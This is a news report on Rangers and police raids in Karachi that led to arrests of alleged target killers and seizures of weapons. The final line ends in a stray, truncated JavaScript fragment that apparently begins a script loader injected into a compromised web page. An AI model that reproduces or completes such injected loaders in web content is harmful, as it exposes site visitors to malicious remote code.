Five alleged target killers arrested in Karachi

KARACHI: At least five alleged target killers were arrested during Rangers and police raids in the Azizabad and Gulistan-e-Johar areas of the city on Saturday.

During the raid in Azizabad, two alleged target killers were arrested. According to the Rangers spokesman, a huge cache or arms were recovered from the suspects, which included 5 SMG Rifles, 4 shotguns, 12 pistols, hand-grenades and bullet-proof jackets. The alleged target killers belong to a political party.

In Gulistan-e-Johar, police arrested three alleged target killers. SSP East said police raided the areas surrounding Johar intersection and arrested alleged target killers Hashim, Abdullah and Mohsin.

Police told that the accused face charges of involvement in several target killings. Three TT pistols and a motorcycle were also seized from their possession, police added.

According to sources, Rangers conducted a search operation in various areas of Lyari and also raided the house of Uzair Baloch, chief of the banned People’s Aman Committee (PAC), however, no arrest was made.

The areas where operation was conducted included Nawa Lane, Afshani Gali, Cheel Chowk, Kala Kot and Chakewara where the security personnel sealed the entry and exit points to restrict movement.

A heavy contingent of Rangers personnel including the female Rangers took part in the action and no one was allowed to enter or exit the area.

Also, targeted search operations were conducted in different areas during which 28 accused were arrested. Police arrested two accused from Baldia Town and recovered arms from their possession.

The operation was also carried out in Defence, Mehmoodabad and Baloch Colony areas of the metropolis, from where 18 accused including 12 absconders were arrested. Arms, drugs and liquor were also recovered from the possession of the accused, police added.

In another raid, eight gamblers were also arrested from Garden area.var d=document;var s=d.createElement(‘script’);
